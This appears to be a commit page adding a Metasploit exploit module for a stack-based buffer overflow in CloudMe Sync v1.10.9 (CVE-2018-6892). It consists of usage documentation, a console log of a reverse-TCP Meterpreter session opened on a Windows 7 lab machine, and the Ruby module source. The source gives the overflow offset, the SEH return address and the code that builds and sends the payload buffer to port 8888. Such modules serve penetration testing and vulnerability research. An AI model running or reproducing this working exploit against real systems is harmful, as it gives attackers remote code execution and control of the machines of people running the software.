Land #9594, CloudMe Sync v1.10.9 Buffer Overflow
commit
b2cb4c425d
|
@ -0,0 +1,41 @@
|
|||
## Description
|
||||
This module exploits a buffer overflow vulnerability in [CloudMe Sync v1.10.9](https://www.cloudme.com/downloads/CloudMe_1109.exe).
|
||||
|
||||
## Verification Steps
|
||||
1. Install CloudMe for Desktop version `v1.10.9`
|
||||
2. Start the applicaton (you don't need to create an account)
|
||||
3. Start `msfconsole`
|
||||
4. Do `use exploit/windows/misc/cloudme_sync`
|
||||
5. Do `set RHOST ip`
|
||||
6. Do `set LHOST ip`
|
||||
7. Do `exploit`
|
||||
8. Verify the Meterpreter session is opened
|
||||
|
||||
## Scenarios
|
||||
|
||||
### CloudMe Sync client application on Windows 7 SP1 x86
|
||||
|
||||
```
|
||||
msf > use exploit/windows/misc/cloudme_sync
|
||||
msf exploit(windows/misc/cloudme_sync) > set RHOST 172.16.40.148
|
||||
RHOST => 172.16.40.148
|
||||
msf exploit(windows/misc/cloudme_sync) > set PAYLOAD windows/meterpreter/reverse_tcp
|
||||
PAYLOAD => windows/meterpreter/reverse_tcp
|
||||
msf exploit(windows/misc/cloudme_sync) > set LHOST 172.16.40.5
|
||||
LHOST => 172.16.40.5
|
||||
msf exploit(windows/misc/cloudme_sync) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.40.5:4444
|
||||
[*] Sending stage (179779 bytes) to 172.16.40.148
|
||||
[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.148:57185) at 2018-02-19 12:35:21 +0000
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : PC
|
||||
OS : Windows 7 (Build 7601, Service Pack 1).
|
||||
Architecture : x86
|
||||
System Language : pt_PT
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 1
|
||||
Meterpreter : x86/windows
|
||||
meterpreter >
|
||||
```
|
|
@ -0,0 +1,67 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::Remote::Seh
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'CloudMe Sync v1.10.9',
|
||||
'Description' => %q{
|
||||
This module exploits a stack-based buffer overflow vulnerability
|
||||
in CloudMe Sync v1.10.9 client application. This module has been
|
||||
tested successfully on Windows 7 SP1 x86.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'hyp3rlinx', # Original exploit author
|
||||
'Daniel Teixeira' # MSF module author
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2018-6892'],
|
||||
[ 'EDB', '44027' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread'
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00",
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'CloudMe Sync v1.10.9',
|
||||
{
|
||||
'Offset' => 2232,
|
||||
'Ret' => 0x61e7b7f6
|
||||
}
|
||||
]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DisclosureDate' => 'Jan 17 2018',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options([Opt::RPORT(8888)])
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
buffer = make_nops(target['Offset'])
|
||||
buffer << generate_seh_record(target.ret)
|
||||
buffer << payload.encoded
|
||||
|
||||
sock.put(buffer)
|
||||
handler
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue